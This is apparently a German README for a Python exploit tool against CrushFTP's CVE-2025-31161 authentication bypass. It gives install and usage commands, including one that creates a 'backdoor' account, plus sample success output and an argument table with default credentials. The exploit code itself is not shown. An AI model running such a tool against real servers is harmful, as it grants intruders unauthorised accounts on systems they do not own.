
🛡️ CVE-2025-31161 - Authentifizierungs-Bypass-Exploit zur Benutzererstellung bei CrushFTP

Dieser Python-Exploit zielt auf CrushFTP-Server ab, die anfällig für CVE-2025-31161 sind. Die Schwachstelle ermöglicht die Erstellung eines Benutzerkontos ohne Authentifizierung durch Senden eines manipulierten XML-Payloads an die WebInterface, was möglicherweise zu einer vollständigen Kompromittierung des Servers führt.
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine explizite Erlaubnis zum Testen haben, ist illegal und unethisch.
requestscoloramaDebian/Ubuntu:
sudo apt update
sudo apt install python3 python3-pip -y
CentOS/RHEL:
sudo yum install python3 python3-pip -y
macOS (mit Homebrew):
brew install python3
pip3 install requests colorama
python3 CVE-2025-31161.py --target_host <ZIEL_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <BENUTZERNAME>] [--password <PASSWORT>]
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
[+] Vorbereiten der Payloads
[-] Ziel wird aufgewärmt...
[-] Ziel läuft und ist erreichbar
[+] Sende Anfrage zur Kontoerstellung
[!] Benutzer erfolgreich erstellt!
[+] Exploit abgeschlossen! Sie können sich jetzt anmelden mit:
[*] Benutzername: AuthBypassAccount
[*] Passwort: CorrectHorseBatteryStaple
Gaurav Bhattacharjee (G4UR4V007)
| Argument | Beschreibung | Standardwert |
|---|
--target_host | (Erforderlich) IP oder Domain des Ziels | — |
--port | Port der CrushFTP WebInterface | 8080 |
--target_user | Admin-Benutzername (im Payload verwendet) | crushadmin |
--new_user | Benutzername für das neue nicht autorisierte Konto | AuthBypassAccount |
--password | Passwort für den neuen Benutzer | CorrectHorseBatteryStaple |